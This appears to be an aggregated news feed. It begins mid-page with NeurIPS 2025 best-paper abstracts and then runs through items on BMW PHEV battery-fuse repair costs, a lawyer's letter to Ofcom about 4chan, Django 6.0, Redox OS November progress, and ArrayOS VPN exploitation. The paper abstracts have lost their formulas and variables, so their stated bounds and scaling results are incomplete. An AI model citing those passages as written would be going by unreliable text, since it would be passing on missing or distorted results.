Diffusion models have achieved remarkable success across a wide range of generative tasks. A key challenge is understanding the mechanisms that prevent their memorization of training data and allow generalization. In this work, we investigate the role of the training dynamics in the transition from generalization to memorization. Through extensive experiments and theoretical analysis, we identify two distinct timescales: an early time  at which models begin to generate high-quality samples, and a later time  beyond which memorization emerges. Crucially, we find that  increases linearly with the training set size , while  remaining constant. This creates a growing window of training times where models generalize effectively, despite showing strong memorization if training continues beyond it. It is only when it becomes larger than a model-dependent threshold that overfitting disappears at infinite training times. These findings reveal a form of implicit dynamical regularization in the training dynamics, which allows to avoid memorization even in highly overparameterized settings. Our results are supported by numerical experiments with standard U-Net architectures on realistic and synthetic datasets, and by a theoretical analysis using a tractable random features model studied in the high-dimensional limit.

Reflections from the Selection Committee

This paper presents foundational work on the implicit regularization dynamics of diffusion models, delivering a powerful result by unifying empirical observation with formal theory. The critical finding is the quantitative identification of two distinct, predictable timescales, an early, dataset-independent generalization phase followed by a linear, dataset-size-dependent memorization phase . This demonstration of an expanding window for effective generalization is not merely an empirical finding but is rigorously  explained by deriving the spectral properties of the random features model using random matrix theory. By linking the practical success of diffusion models directly to a provable dynamical property (the implicit postponement of overfitting), the paper provides fundamental, actionable insight into the mechanisms governing modern generative AI, setting a new standard for analytical depth in the study of  generalization.

Runners Up

Does Reinforcement Learning Really Incentivize Reasoning Capacity in LLMs Beyond the Base Model?

Yang Yue , Zhiqi Chen , Rui Lu , Andrew Zhao , Zhaokai Wang , Yang Yue , Shiji Song , Gao Huang

Abstract

Reinforcement Learning with Verifiable Rewards (RLVR) has recently demonstrated notable success in enhancing the reasoning performance of large language models (LLMs), particularly in mathematics and programming tasks. It is widely believed that, similar to how traditional RL helps agents to explore and learn new strategies, RLVR enables LLMs to continuously self-improve, thus acquiring novel reasoning abilities that exceed the capacity of the corresponding base models. In this study, we take a critical look at \textit{the current state of RLVR} by systematically probing the reasoning capability boundaries of RLVR-trained LLMs across diverse model families, RL algorithms, and math/coding/visual reasoning benchmarks, using pass@\textit{k} at large \textit{k} values as the evaluation metric. While RLVR improves sampling efficiency towards the correct path, we surprisingly find that current training does \emph{not} elicit fundamentally new reasoning patterns. We observe that while RLVR-trained models outperform their base models at smaller values of  (\eg, =1), base models achieve higher pass@ score when  is large. Moreover, we observe that the reasoning capability boundary of LLMs often narrows as RLVR training progresses. Further coverage and perplexity analysis shows that the reasoning paths generated by RLVR models are already included in the base models’ sampling distribution, suggesting that their reasoning abilities originate from and are \textit{bounded} by the base model. From this perspective, treating the base model as an upper bound, our quantitative analysis shows that six popular RLVR algorithms perform similarly and remain far from optimal in fully leveraging the potential of the base model. In contrast, we find that distillation can introduce new reasoning patterns from the teacher and genuinely expand the model’s reasoning capabilities. Taken together, our findings suggest that current RLVR methods have not fully realized the potential of RL to elicit genuinely novel reasoning abilities in LLMs. This underscores the need for improved RL paradigms—such as continual scaling and multi-turn agent-environment interaction—to unlock this potential.

Reflections from the Selection Committee

This paper delivers a masterfully executed and critically important negative finding on a widely accepted, foundational assumption in Large Language Model (LLM) research: that Reinforcement Learning with Verifiable Rewards (RLVR) elicits genuinely new reasoning capabilities. The paper shows that RLVR training, across various model families, tasks, and algorithms, enhances sampling efficiency without expanding the reasoning capacity already present in base models. RL narrows exploration, rewarded trajectories are amplified, but the broader solution space shrinks, revealing that RLVR optimizes within, rather than beyond, the base distribution. This is an important finding which will hopefully incentivize fundamentally new RL paradigms able to navigate the vast action space and  genuinely expand LLM reasoning capabilities.

Optimal Mistake Bounds for Transductive Online Learning

Zachary Chase , Steve Hanneke , Shay Moran , Jonathan Shafer

Abstract

We resolve a 30-year-old open problem concerning the power of unlabeled data in online learning by tightly quantifying the gap between transductive and standard online learning. We prove that for every concept class  with Littlestone dimension , the transductive mistake bound is at least . This establishes an exponential improvement over previous lower bounds of , , and , respectively due to Ben-David, Kushilevitz, and Mansour (1995, 1997) and Hanneke, Moran, and Shafer (2023). We also show that our bound is tight: for every , there exists a class of Littlestone dimension  with transductive mistake bound . Our upper bound also improves the previous best known upper bound from Ben-David et al. (1997). These results demonstrate a quadratic gap between transductive and standard online learning, thereby highlighting the benefit of advanced access to the unlabeled instance sequence. This stands in stark contrast to the PAC setting, where transductive and standard learning exhibit similar sample complexities.

Reflections from the Selection Committee

This paper presents a breakthrough in learning theory, deserving the NeurIPS Best Paper Runner-Up award for its elegant, comprehensive, and definitive resolution of a 30-year-old open problem. The authors have not only precisely quantified the optimal mistake bound for transductive online learning as Ω(√d), but they have also achieved a tight match with an O(√d) upper bound. This establishes a quadratic gap between transductive and standard online learning, a result that represents an exponential leap beyond all previous logarithmic lower bounds and dramatically highlights the theoretical value of unlabeled data in this setting—a crucial insight distinct from its more limited role in PAC learning.

The novelty and ingenuity of their proof techniques are quite remarkable. For the lower bound, the adversary employs a sophisticated strategy that balances forcing mistakes with carefully managing the shrinking of the version space, leveraging the concept of “paths in trees” as a fundamental underlying structure. The upper bound, demonstrating the learnability within O(√d) mistakes, introduces an innovative hypothesis class construction that embeds a “sparse encoding” for off-path nodes – a probabilistic design where most off-path labels are zero, but the rare ones carry immense information. The learner’s strategy to exploit this class is equally brilliant, integrating several non-standard sophisticated techniques: “Danger Zone Minimization” to control the instance sequence presented by the adversary, “Splitting Experts” via a multiplicative weights approach to handle uncertainty about a node’s on-path status, and a strategic “Transition to Halving” once sufficient information is gathered from the sparsely encoded off-path labels. This intricate interplay between a cleverly constructed hypothesis class and a highly adaptive learning algorithm showcases a masterclass in theoretical analysis and design.

Superposition Yields Robust Neural Scaling

Yizhou Liu , Ziming Liu , Jeff Gore

Abstract

The success of today’s large language models (LLMs) depends on the observation that larger models perform better. However, the origin of this neural scaling law, that loss decreases as a power law with model size, remains unclear. We propose that representation superposition, meaning that LLMs represent more features than they have dimensions, can be a key contributor to loss and cause neural scaling. Based on Anthropic’s toy model, we use weight decay to control the degree of superposition, allowing us to systematically study how loss scales with model size. When superposition is weak, the loss follows a power law only if data feature frequencies are power-law distributed. In contrast, under strong superposition, the loss generically scales inversely with model dimension across a broad class of frequency distributions, due to geometric overlaps between representation vectors. We confirmed that open-sourced LLMs operate in the strong superposition regime and have loss scaling inversely with model dimension, and that the Chinchilla scaling laws are also consistent with this behavior. Our results identify representation superposition as a central driver of neural scaling laws, providing insights into questions like when neural scaling laws can be improved and when they will break down.

Reflections from the Selection Committee:

This paper moves beyond observation of neural scaling laws—the empirically established phenomenon in which model loss exhibits a power-law decrease as model size, dataset size, or computational resources are increased—to demonstrate that representation superposition constitutes the primary mechanism governing these laws. Authors introduce a controlled “toy model” to examine how superposition and data structure affect the scaling of loss with model size and demonstrate that under strong superposition where features are overlapping, the loss scales consistently as an inverse power law with respect to the model dimension. The core findings are supported by a series of carefully designed experiments and offer fresh insights into an important research area.

The selection of these papers reflects the remarkable breadth of research presented at NeurIPS 2025, spanning generative modeling, reinforcement learning, natural language processing, learning theory, neural scaling, and benchmarking methodologies. The diversity of topics among the awarded papers demonstrates the vibrant and multifaceted nature of machine learning research.

We extend our congratulations to all the award recipients and look forward to seeing these works presented at the conference this December! Please note that the award certificates will be given out during the paper’s respective oral sessions by the session chairs.

We would also like to extend our gratitude and appreciation to the members of the Best Paper Award Committee listed here.

Best Paper Award Committee for Main Track and Database and Benchmark Tracks

  • Jacob Andreas (MIT, United States)
  • Sander Dieleman (Google DeepMind, UK)
  • Dilek Hakkani-Tur (University of Illinois Urbana-Champaign, United States)
  • Brian Kingsbury (IBM, United States)
  • Mirella Lapata (University of Edinburgh, Scotland)
  • Vincent Lepetit (Ecole des Ponts ParisTech, France)
  • Ulrich Paquet (AIMES & Google DeepMind, Africa)
  • Violet Peng (UCLA, United States)
  • Doina Precup (McGill University, Canada)
  • Masashi Sugiyama (RIKEN & University of Tokyo, Japan)
  • Vincent Tan (National University of Singapore, Singapore)
  • Yee Whye Teh (University of Oxford, United Kingdom)
  • Xing Xie (Microsoft, China)
  • Luke Zettlemoyer (University of Washington/Meta, United States)

BMW PHEV: When EU engineering becomes a synonym for "unrepairable" (EV Clinic)

Hacker News
evclinic.eu
2025-12-05 01:05:57
Comments...
Original Article

2021 > PHEV BMW iBMUCP PHEV Post-Crash Recovery — When EU engineering becomes a synonym for “unrepairable” + “generating waste”.

If you own a BMW PHEV — or if you’re an insurance company — every pothole, every curb impact, and even every rabbit jumping out of a bush represents a potential €5,000 cost, just for a single fuse inside the high-voltage battery system.
This “safety fuse” is designed to shut the system down the moment any crash event is detected. Sounds safe — but extremely expensive. Theoraticaly insurance for BMW PHEV should be 3x higher than ICE or EV

Unfortunately, that’s not the only issue.

BMW has over-engineered the diagnostic procedure to such a level that even their own technicians often do not know the correct replacement process. And it gets worse: the original iBMUCP module, which integrates the pyrofuse, contactors, BMS and internal copper-bonded circuitry, is fully welded shut. There are no screws, no service openings, and it is not designed to be opened, even though the pyrofuse and contactors are technically replaceable components. Additionally, the procedure requires flashing the entire vehicle both before and after the replacement, which adds several hours to the process and increases risk of bricked components which can increase the recovery cost by factor 10x.

But that is still not the only problem.

Even after we managed to open the unit and access everything inside, we discovered that the Infineon TC375 MCU is fully locked. Both the D-Flash sectors and crash-flag areas are unreadable via DAP or via serial access.
Meaning: even if you replace the pyrofuse, you still cannot clear the crash flag, because the TC375 is cryptographically locked.

This leaves only one method:
➡️ Replace the entire iBMUCP module with a brand-new one. (1100€ + tax for faulty fuse)

And the registration of the new component is easily one of the worst procedures we have ever seen. You need an ICOM, IMIB, and AOS subscription — totalling over €25,000 in tools — just to replace a fuse. (even we managed to activate this one with IMIB, it will be necessary in some situation)
Yes, you read that correctly, 25,000€

Lot of vehicles designed and produced in Europe — ICE, PHEV, and EV — have effectively become a missleading ECO exercise. Vehicles marketed as “CO₂-friendly” end up producing massive CO₂ footprints through forced services, throw-away components, high failure rates and unnecessary parts manufacturing cycles, overcomplicated service procedures, far larger than what the public is told. If we are destroying our ICE automotive industry based on EURO norms, who is calculating real ECO footprint of replacement part manucfacturing, unecessary servicing and real waste cost?

We saw this years ago on diesel and petrol cars:
DPF failures, EGR valves, high-pressure pumps, timing belts running in oil, low quality automatic transmissions, and lubrication system defects. Everyone calculates the CO₂ footprint of a moving vehicle — nobody calculates the CO₂ footprint of a vehicle that is constantly broken and creating waste.

ISTA’s official iBMUCP replacement procedure is so risky that if you miss one single step — poorly explained within ISTA — the system triggers ANTITHEFT LOCK.
This causes the balancing controller to wipe and lock modules.
Meaning: even in an authorised service centre, system can accidentally delete the configuration and end up needing not only a new iBMUCP, but also all new battery modules.

Yes — replacing a fuse can accidentally trigger the replacement of all healthy HV modules, costing €6,000+ VAT per module, plus a massive unknown CO₂ footprint.
This has already happened to several workshops in the region.

The next problem: BMW refuses to provide training access for ISTA usage. We submitted two official certification requests — both were rejected by the central office in Austria, which is borderline discriminatory.

One more next problem: Battery erasal can happen in OEM and can happen in our or any other 3rd party workshop, but if procedure was started in workshop 1, it cant be continued in workshop 2. If battery damage happens in our workshop during fuse change, and than battery swap needed, we or even OEM workshop do not cover costs of completely new battery pack. Which increases heavily ownership costs.

All of this represents unnecessary complexity with no meaningful purpose.
While Tesla’s pyrofuse costs €11 and the BMS reset is around 50€, allowing the car to be safely restored, BMW’s approach borders on illogical engineering, with no benefit to safety, no benefit to anti-theft protection — the only outcome is the generation of billable labour hours and massive amounts of needless electronic/lithium waste.

Beyond that, we are actively working on breaking the JTAG/DAP protection to gain direct access to the D-Flash data and decrypt its contents together with our colleagues from Hungary. The goal is to simplify the entire battery-recovery procedure, reduce costs, and actually deliver the CO₂ reduction that the EU keeps missleading— since the manufacturers clearly won’t.

Part number: 61 27 8 880 208

Faults: 21F2A8 High voltage battery unit, terminal
High voltage battery safety: capsule Defective trigger/control electronics

21F35B high voltage battery unit,
voltage and electric current sensor, current: Counter for the reuse of cell modules exceeded (safety function)

21F393 High voltage battery unit, fault
cumulative: Memory of faults that prevent the
active transport

3B001D High voltage battery unit,
contactor excitation controller circuit breakers: Double fault

21F37E Collision Detection: Collision
detected due to ACSM signal

21F04B High voltage battery unit,
Safety function: Reset command units executed

OEM Service cost: 4000€+tax (aprox – if you have bmw quote, send)
OEM iBMUCP : 1100€+tax
Labor hours: 24h – 50h

EVC: 2500€+tax (full service)

**It is cheaper to change LG Battery on Tesla, than changing fuse on BMW PHEV, and probably even less CO2 footpring

If you want to book your service with EV CLINIC:

Zagreb 1: www.evclinic.hr
Berlin: www.evclinic.de
Slovenija: www.evclinic.si
Serbia: www.evclinic.rs

The Ofcom Files, Part 4: Ofcom Rides Again

Hacker News
prestonbyrne.com
2025-12-05 00:41:08
Comments...
Original Article

This is a continuation of the Ofcom Files, a series of First Amendment-protected public disclosures designed to inform the American and British public about correspondence that the UK’s censorship agency, Ofcom, should prefer to keep secret. See Part 1 , Part 2 , and Part 3 .

We heard from Ofcom again today.

The agency writes:

The full letter Ofcom attached to their e-mail was full of legally illiterate nonsense claiming extraterritorial power to enforce their censorship laws against Americans in the United States.

Bryan Lunduke highlighted the key bits over on X. The full letter is at the bottom of this post.

The United Kingdom’s Ofcom has sent yet another threatening letter to 4chan (a US company).

After 4chan refused to pay fines to a foreign government, the United Kingdom says they are “expanding the scope of the investigation into 4chan”.

UK’s Ofcom states that United Kingdom… pic.twitter.com/nNhhCmHKsa

— The Lunduke Journal (@LundukeJournal) December 4, 2025

We replied as follows:

Sirs,

Last night Sarah Rogers, the United States Under Secretary of State for Public Diplomacy, let it be known on GB News , in London, that the United States Congress is considering introducing a federal version of the GRANITE Act.

The GRANITE Act , at state level, is a foreign censorship shield law reform proposal I threw together exactly 51 days ago on my personal blog. Colin Crossman, Wyoming’s Deputy Secretary of State, turned it into a bill . Now, it seems, very dedicated staffers in Congress and our principled elected representatives are keen to make it a federal law.

The proposal was inspired by your agency’s censorship letters, letters targeting Amercians in America for conduct occurring wholly and exclusively in America, letters just like this one and the dozen others you’ve sent to my countrymen over the last eleven months.

It was also inspired by the passive-aggressive phone call I had with officials from your Home Office in 2023 asking me how my clients would implement your rules because, according to them, my clients’ users would demand that they comply (as far as I am aware, of my clients’ tens of millions of users among their various websites, not a single one has asked to be censored by the British). I replied that if your country wanted to censor my clients, the British Army would need to commence a ground invasion of the United States and seize their servers by force. That answer remains unchanged.

4chan is a website where users are free to remain anonymous. Your “age assurance” rules would destroy anonymity online, which is protected by the First Amendment. Accordingly, 4chan will not be implementing your “age assurance” rules.

Prompt and voluntary cooperation with law enforcement on child safety issues, including UK law enforcement, is what really matters for children’s safety online. That work happens quietly and non-publicly with officials who are tasked with performing it, namely, the police. My client will not be working with you on that important work because your agency is a censorship agency, not a law enforcement agency. Ofcom lacks the competence and the jurisdiction to do the work that actually matters in this space.

Regardless of whether GRANITE makes it on the books or not, and I will do everything in my personal power to ensure that it does, my clients don’t answer to you, 4chan included, because of the First Amendment. But then, Ofcom already knew that.

I copy the U.S. government and government officials in several states. My client reserves all rights.

Preston Byrne

Pretty sure my invitation to Number 10’s Christmas party is going to get lost in the post this year.

There is a possible future, in the very near future, where these notices will be utterly impossible for foreign governments to send to American citizens – notices I have been parrying, professionally, for eight years.

America needs to protect her builders from this foreign overreach. I am extremely hopeful that the U.S. Congress and the White House will seal the deal and secure the American-led future of the Internet for decades to come. We’re not there yet, but we’re close.

AV1 – Now Powering 30% of Netflix Streaming

Hacker News
netflixtechblog.com
2025-12-05 00:09:57
Comments...

Django 6.0 released

Simon Willison
simonwillison.net
2025-12-04 23:57:34
Django 6.0 released Django 6.0 includes a flurry of neat features, but the two that most caught my eye are background workers and template partials. Background workers started out as DEP (Django Enhancement Proposal) 14, proposed and shepherded by Jake Howard. Jake prototyped the feature in django-t...
Original Article

Django 6.0 released . Django 6.0 includes a flurry of neat features , but the two that most caught my eye are background workers and template partials .

Background workers started out as DEP (Django Enhancement Proposal) 14 , proposed and shepherded by Jake Howard. Jake prototyped the feature in django-tasks and wrote this extensive background on the feature when it landed in core just in time for the 6.0 feature freeze back in September.

Kevin Wetzels published a useful first look at Django's background tasks based on the earlier RC, including notes on building a custom database-backed worker implementation.

Template Partials were implemented as a Google Summer of Code project by Farhan Ali Raza. I really like the design of this. Here's an example from the documentation showing the neat inline attribute which lets you both use and define a partial at the same time:

{# Define and render immediately. #}
{% partialdef user-info inline %}
    <div id="user-info-{{ user.username }}">
        <h3>{{ user.name }}</h3>
        <p>{{ user.bio }}</p>
    </div>
{% endpartialdef %}

{# Other page content here. #}

{# Reuse later elsewhere in the template. #}
<section class="featured-authors">
    <h2>Featured Authors</h2>
    {% for user in featured %}
        {% partial user-info %}
    {% endfor %}
</section>

You can also render just a named partial from a template directly in Python code like this:

return render(request, "authors.html#user-info", {"user": user})

I'm looking forward to trying this out in combination with HTMX .

I asked Claude Code to dig around in my blog's source code looking for places that could benefit from a template partial. Here's the resulting commit that uses them to de-duplicate the display of dates and tags from pages that list multiple types of content, such as my tag pages .

Text a community college librarian

Simon Willison
simonwillison.net
2025-12-04 23:52:21
I take tap dance evening classes at the College of San Mateo community college. A neat bonus of this is that I'm now officially a student of that college, which gives me access to their library... including the ability to send text messages to the librarians asking for help with research. I recently...
Original Article

I take tap dance evening classes at the College of San Mateo community college. A neat bonus of this is that I'm now officially a student of that college, which gives me access to their library... including the ability to send text messages to the librarians asking for help with research.

I recently wrote about Coutellerie Nontronnaise on my Niche Museums website, a historic knife manufactory in Nontron, France. They had a certificate on the wall claiming that they had previously held a Guinness World Record for the smallest folding knife, but I had been unable to track down any supporting evidence.

I posed this as a text message challenge to the librarians, and they tracked down the exact page from the 1989 "Le livre guinness des records" describing the record!

Le plus petit

Les établissements Nontronnaise ont réalisé un couteau de 10 mm de long, pour le Festival d’Aubigny, Vendée, qui s’est déroulé du 4 au 5 juillet 1987.

Thank you, Maria at the CSM library.

This Month in Redox - November 2025

Lobsters
www.redox-os.org
2025-12-04 23:19:14
Comments...
Original Article
By Ribbon and Ron Williams on

  • WebKitGTK3 web browser example and bottom system monitor

Redox OS is a complete Unix-like general-purpose microkernel-based operating system written in Rust. November was a very exciting month for Redox! Here’s all the latest news.

If you would like to support Redox, please consider donating or buying some merch!

Wayland on Redox!

Jeremy Soller successfully ported the Smallvil Wayland compositor example from the Smithay framework and GTK3 Wayland to Redox. Special thanks to Ibuki Omatsu (Unix Domain Socket implementation and bug fixing), Wildan Mubarok (bug fixing and implementation of missing functions), and other contributors for making it possible. Smallvil performance on Redox is not adequate, so we still have work to do on Wayland support, but this represents a huge step forward.

  • GTK3 Wayland Demo running on Smallvil compositor

WebKitGTK on Redox!

Jeremy Soller and Wildan Mubarok successfully ported and fixed WebKitGTK (GTK 3.x frontend) and its web browser example on Redox. Thanks again to other contributors which helped us to achieve this.

This is first full-featured browser engine ported to Redox, allowing most websites to work.

MATE Desktop on Redox!

Jeremy Soller was porting MATE Marco for a better X11 window manager and decided to port a basic MATE desktop.

More Boot Fixes

Jeremy Soller added and fixed many driver timeouts to block more infinite loop bugs and continue booting, he also updated system components and drivers to deamonize after starting and moved the hardware initialization to their child process to fix hangs and allow the boot to continue in more hardware.

If you have a computer that hangs on Redox boot we recommend that you test again with the latest daily image.

Migration to i586

The Rust upstream migrated the i686 CPU targets to i586. The Redox build system and documentation have been updated to use i586 as the CPU architecture target name for 32-bit x86 computers.

Jeremy Soller and Wildan Mubarok implemented a feature to allow recipes to configure what build tools they need, and these build tools being available as recipes. It will allow the following benefits:

  • Simplifies the Redox build system, so applications, libraries, and build tools use the same build environment and packaging system
  • Greatly reduces build system configuration time in both Podman and Native builds, as developers will only install the build tools for the recipes that they are using
  • Removes the maintenance effort of updating the list of build tool packages required for each Unix-like platform whenever a build tool package is added for the Native Build
  • Eases relibc testing on Linux
  • Allows the future implementation of full source bootstraping to avoid compiler backdoors, like Guix

Build System Submodule Removal

Jeremy Soller unified the build system repositories, merging the submodules into the main build system repository . This will help to simplify build system improvements, keep everything synchronized, and allow faster development and testing.

If you haven’t updated your build system yet, you should backup your changes, and either run the make distclean pull container_clean all command, or download a new build system copy ( git clone https://gitlab.redox-os.org/redox-os/redox.git ) and build from scratch.

More GitLab Protection

After suffering frequent GitLab slowdowns, we discovered that bots were using our CI for cryptomining (again) and AI scrapers were consuming the server resources making it very slow. As a consequence, we increased our protection, which changed some things:

  • By default, only maintainers can run CI jobs. If you are working on solving CI problems, let us know and we can discuss temporary access to CI.
  • Git code push using SSH has been disabled until we find a way to fix it. All contributors will need to use HTTPS with a PAT (Personal Access Token) for git push usage.

The book has been updated with instructions on how to configure your PAT .

Kernel Improvements

  • (kernel) 4lDO2 fixed a memory allocator panic and data corruption bug
  • (kernel) Jeremy Soller enabled serial interrupts in ARM64 ACPI
  • (kernel) Jeremy Soller implemented nested event queues
  • (kernel) Jeremy Soller implemented kfpath in some schemes
  • (kernel) Jeremy Soller implemented F_DUPFD_CLOEXEC
  • (kernel) Jeremy Soller improved the futex lockup performance
  • (kernel) Jeremy Soller improved CPU stat accuracy
  • (kernel) Jeremy Soller improved the i586 CPU stats
  • (kernel) Jeremy Soller fixed an event queue race condition with pipes
  • (kernel) Jeremy Soller reduced warnings for legacy scheme path on GUI applications
  • (kernel) Anhad Singh fixed some deadlocks
  • (kernel) bjorn3 did some code cleanups
  • (kernel) AArch Angel implemented kfpath on DTB scheme

Driver Improvements

  • (drivers) Jeremy Soller fixed missing PCI devices in Intel Arrow Lake computers
  • (drivers) Jeremy Soller improved the PS/2 driver stability
  • (drivers) Jeremy Soller improved the Intel HD Audio driver error handling
  • (drivers) Jeremy Soller implemented unaligned access on the PCI driver
  • (drivers) Ibuki Omatsu updated the alxd , ihdad , ac97d , and sb16d drivers to use the redox-scheme library, which makes them up-to-date
  • (drivers) bjorn3 unified the interrupt vector handling code between the Intel HD Audio and Realtek ethernet drivers
  • (drivers) bjorn3 merged the drivers repository into the base repository. It will allow faster development and testing, especially for driver initialization, and simplify configuration.

System Improvements

  • (sys) Jeremy Soller improved log verbosity on system bootstrap
  • (sys) Jeremy Soller implemented support for MSG_DONTWAIT in Unix Domain Sockets
  • (sys) Jeremy Soller implemented SO_PEERCRED in Unix streams
  • (sys) Jeremy Soller implemented the fpath() function in the proc scheme
  • (sys) Jeremy Soller implemented the fstat() function in the IPC daemon
  • (sys) Jeremy Soller did a refactor of fevent() function handling
  • (sys) Jeremy Soller fixed SO_SNDBUF in IPC daemon
  • (sys) Jeremy Soller replaced the Smith text editor by Kibi in the minimal variants
  • (sys) bjorn3 reduced the uutils compilation time by a third (2m50s to 1m56s on his computer) by using ThinLTO instead of FatLTO
  • (sys) bjorn3 fixed some code warnings

Relibc Improvements

  • (libc) 4lDO2 implemented a macro to verify if the relibc internal definitions match the Rust libc crate definitions
  • (libc) Jeremy Soller implemented the sys/queue.h function group
  • (libc) Jeremy Soller improved the TLS alignment reliability
  • (libc) Jeremy Soller improved the safety of programs that close file descriptors in a range
  • (libc) Jeremy Soller implemented the ppoll() function
  • (libc) Jeremy Soller fixed a possible POSIX thread key collision
  • (libc) Jeremy Soller fixed the ai_addrlen and socklen_t type definitions
  • (libc) Josh Megnauth implemented the posix_fallocate() function
  • (libc) Ibuki Omatsu fixed the getpeername() function in Unix Streams
  • (libc) Wildan Mubarok fixed the getsubopt() function
  • (libc) auronandace improved the documentation of some POSIX functions

Networking Improvements

  • (net) Wildan Mubarok improved the network stack error handling

RedoxFS Improvements

  • (redoxfs) Jeremy Soller updated the fpath() function to use the new scheme format
  • (redoxfs) Jeremy Soller fixed a panic due to inline data overflow

Orbital Improvements

  • (gui) bjorn3 did some code refactorings
  • (gui) Wildan Mubarok fixed the orbclient example
  • (gui) Wildan Mubarok optimized the orbclient library gradient calculation

Programs

  • (programs) Jeremy Soller updated the Rust recipe version to match the Redox cross-compiler on Linux
  • (programs) Jeremy Soller enabled DRI3 on Mesa3D and X11
  • (programs) Jeremy Soller updated GnuTLS to use dynamic linking
  • (programs) Jeremy Soller fixed the Luanti and librsvg compilation
  • (programs) Wildan Mubarok ported the EGL code from Mesa3D
  • (programs) Wildan Mubarok fixed OpenLara and Rustual Boy compilation
  • (programs) Anhad Singh fixed the Fish shell execution

Packaging Improvements

  • (pkg) Wildan Mubarok started to implement recipe features which will allow more flexibility with software options
  • (pkg) Wildan Mubarok implemented recursive recipe dependencies which will allow us to use implicit dependencies (remove duplicated dependencies) and reduce maintenance cost
  • (pkg) Wildan Mubarok implemented package size and BLAKE3 hash on package information, which allow accurate download progress bar and package update verification
  • (pkg) Wildan Mubarok fixed the package manager not detecting installed packages from the build system

Debugging Improvements

  • (debug) Jeremy Soller implemented the support for userspace stack traces
  • (debug) Jeremy Soller reduced unnecessary logging on system components and drivers to ease boot problem reporting

Build System Improvements

  • (build) Wildan Mubarok implemented an option ( FSTOOLS_IN_PODMAN environment variable) to build and run the filesystem tools in the Podman container, it fixes a problem with FUSE on MacOS, NixOS and GuixSD
  • (build) Wildan Mubarok updated the Cargo recipe template to use dynamic linking
  • (build) Wildan Mubarok improved REPO_BINARY option to cache downloaded packages between image rebuilds
  • (build) Wildan Mubarok updated Cookbook unfetch to also clean recipe binaries, removing the need to use the uc.recipe recipe target
  • (build) Wildan Mubarok did a code simplification in Cookbook which reduced dependencies
  • (build) Wildan Mubarok did a code simplification in the installer which reduced most dependencies
  • (build) Wildan Mubarok fixed some breaking changes after the Rust implementation of Cookbook
  • (build) Wildan Mubarok fixed the Nix flake (not tested on NixOS, only the package manager on Debian)
  • (build) Wildan Mubarok fixed the MacOS support on Apple Silicon
  • (build) Wildan Mubarok configured the default GNU FTP mirror as Berkeley university to fix very slow download speed when downloading source tarballs sometimes
  • (build) Ribbon fixed missing ARM64 and RISC-V emulators and reduced the QEMU installation time and size by only installing the emulators for the CPU architectures supported by Redox

Redoxer Improvements

  • (redoxer) Wildan Mubarok implemented a way to build and run tests from C/C++ programs
  • (redoxer) Wildan Mubarok fixed the toolchain downloading for Linux ARM64 distributions
  • (redoxer) Wildan Mubarok did a code simplification in Redoxer which reduced dependencies by half

Documentation Improvements

  • (doc) Ribbon updated and improved the Coding and Building page, now it has fully up-to-date information
  • (doc) Ribbon updated and improved some book pages to use the new recipe push feature to save development time
  • (doc) Ribbon documented the REPO_OFFLINE (offline mode) environment variable
  • (doc) Ribbon documented the make cook (Build the filesystem enabled recipes), make push (only install recipe packages with changes in an existing QEMU image), make tree (show the filesystem configuration recipes and recipe dependencies tree ), make find (show recipe packages location), and make mount_live (mount the live disk ISO) commands
  • (doc) Ribbon documented the make x.--all (run a recipe option in all recipes) and make x.--category-category-name (run a recipe option in a recipe category folder) commands
  • (doc) Ribbon documented the source.shallow_clone data type (to enable Git shallow clone in recipes)
  • (doc) Ribbon moved the Cookbook package policy to the Application Porting page and improved the recipe TODO suggestions
  • (doc) Ribbon updated and fixed the Build Process page
  • (doc) Ribbon updated how to contribute using the GitLab web interface
  • (doc) Ribbon explained how to write book documentation and improved how to review MRs in the Developer FAQ
  • (doc) Ribbon documented how to create diagrams for Hugo in the Developer FAQ
  • (doc) Wildan Mubarok expanded and improved the Important Programs and Our Goals pages
  • (doc) Wildan Mubarok improved the pre-i586 CPU support information with more details
  • (doc) Wildan Mubarok updated and improved the Configuration Settings page with new options
  • (doc) Wildan Mubarok documented the new/better method to prevent breakage of local recipe changes
  • (doc) Wildan Mubarok documented the Cookbook offline mode
  • (doc) Wildan Mubarok documented the Cookbook configuration
  • (doc) Wildan Mubarok documented the CI (disable parallel recipe fetch/build and Cookbook TUI), COOKBOOK_MAKE_JOBS (set the number of CPU threads for recipe compilation), COOKBOOK_VERBOSE (enable more recipe log information) and COOKBOOK_LOGS (option to save recipe logs at build/logs/$TARGET ) environment variables
  • (doc) Wildan Mubarok moved the Cookbook recipe tarball mirror documentation to the “Configuration Settings” page
  • (doc) Timmy Douglas documented how to build Redox on GuixSD
  • (doc) Jonathan McCormick applied alphabetical order in the hardware compatibility tables and improved grammar

Hardware Updates

  • (hw) Jonathan McCormick tested Lenovo ThinkCentre M83 and reported the “Broken” status using an image from 2025-11-09

Website Improvements

How To Test The Changes

To test the changes of this month download the server or desktop variants of the daily images .

Use the desktop variant for a graphical interface. If you prefer a terminal-style interface, or if the desktop variant doesn’t work, please try the server variant.

  • If you want to test in a virtual machine use the “harddrive” images
  • If you want to test on real hardware use the “livedisk” images

Read the following pages to learn how to use the images in a virtual machine or real hardware:

Sometimes the daily images are outdated and you need to build Redox from source. For instructions on how to do this, read the Building Redox page.

Join us on Matrix Chat

If you want to contribute, give feedback or just listen in to the conversation, join us on Matrix Chat .

Coca Cola has an executive dedicated to McDonald's

Hacker News
www.coca-colacompany.com
2025-12-04 23:12:33
Comments...
Original Article

President, The McDonald’s Division

Roberto Mercade is president of The McDonald’s Division (TMD) of The Coca‑Cola Company. He leads a global organization that is responsible for the company’s key relationship with McDonald's in more than 100 markets.

Mercade has been with Coca‑Cola since 1992, when he began his career as a production services manager in Puerto Rico. He went on to hold a number of roles before being named general manager of the Venezuela & Caribbean franchise unit in 2006.

In 2011, he became general manager in South Africa. In 2014, Mercade moved to Australia to lead the South Pacific business unit.

He returned to Latin America in 2018 as president of the Latin Center business unit. In 2021, he became the Mexico zone president.

Mercade holds a degree in industrial engineering from the Georgia Institute of Technology.

We gave 5 LLMs $100K to trade stocks for 8 months

Hacker News
www.aitradearena.com
2025-12-04 23:08:25
Comments...

Hackers are exploiting ArrayOS AG VPN flaw to plant webshells

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 23:05:05
Threat actors have been exploiting a command injection vulnerability in Array AG Series VPN devices to plant webshells and create rogue users. [...]...
Original Article

Hackers are exploiting ArrayOS AG VPN flaw to plant webshells

Threat actors have been exploiting a command injection vulnerability in Array AG Series VPN devices to plant webshells and create rogue users.

Array Networks fixed the vulnerability in a May security update, but has not assigned an identifier, complicating efforts to track the flaw and patch management.

